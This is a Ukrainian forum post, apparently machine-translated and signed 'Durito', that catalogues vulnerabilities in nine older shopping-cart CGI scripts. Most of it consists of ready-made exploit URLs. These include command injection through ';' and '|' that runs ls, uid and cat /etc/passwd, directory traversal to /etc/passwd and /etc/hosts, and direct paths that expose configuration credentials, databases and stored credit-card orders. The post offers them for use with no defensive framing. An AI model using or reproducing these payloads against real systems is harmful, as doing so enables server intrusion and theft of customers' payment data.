Продовжуємо наше вивчення багів популярних в недалекому минулому торгових візках.
Цього разу ми на початку розглянемо візки які дозволяли виконувати довільні команди, а після і інша смакота.
№ 1-м у нас піде (e) shop Online-Shop System від Webdiscount.net
скрипт не фільтрує символи конвеєра (;) і пейапа (|):
www.xxx.com/cgi-bin/eshop.pl? seite =; ls |
№ 2 Hassan Consulting's Shoping cart [shop.cgi] від Hassan Consulting.
теж саме:
www.xxx.com/cgi-local/shop.pl/page= | ls |
www.xxx.com/cgi-local/shop.pl/page=; ls |
на жаль в версіях 4 і вище Hassan Consulting's Shoping cart цей баг вже відсутня, але є інша проблема, при запиті www.xxx.com/cgi-local/shop.pl можна дізнатися версію торгової візки і шлях до скрипта.
№ 3 ShopPlus Cart
те ж саме, відсутня перевірка на символи, що вводяться:
www.xxx.com/scripts/shopplus.cgi? dn = domainname.com & cartid =% CARTID% & file =; uid |
www.xxx.com/scripts/shopplus.cgi? dn = domainname.com & cartid =% CARTID% & file =; cat% 20 / etc / passwd |
№ 4 multi-shop 1.06
Замість template файлу можна вказати будь-яку команду.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf & user_notebooks = note_envoy
№ 5 WebCart від Mountain Network Systems
виконуємо віддалені команди:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD
Далі розглядаються інші уразливості
№ 6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities
Додавання в кінець певних змінних і значень до http: //target/cgi-bin/cart.pl?
дозволить віддаленим користувачам виконувати деякі дії.
"Vars" відобразить параметри
настройки конфігурації програми, яке включає ім'я користувача і пароль, який використовується
для угод кредитної картки.
Параметри настройки Навколишнього середовища можуть бути отримані,
використовуючи "env".
Рядок "db" перерахує повний файл бази даних, що містить всі предмети в shopping cart.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db
№ 7 ShopCartCGI v 2.3
вада дозволяє віддаленому користувачеві переглядати файли на сервері:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../ .. /../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../. ./../../../../etc/passwd
№ 8 QuikStore Shopping Cart
Віддалений користувач може переглядати файли на системі:
www.xxx.com/quikstore.cgi?blah&template=../../.
./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/ hosts
www.xxx.com/quikstore.cgi?blah&t emplate = .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / usr / bin / id |
№ 9 DCShop Electronic Shopping Cart
Цілий набір багів:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - інформація про кредитки старих версіях візки проглядалася так.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - видає інфу про кредитки деяких нових версіях.
Твій bug Durito.
_________________
EAT THE RICH!
|
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.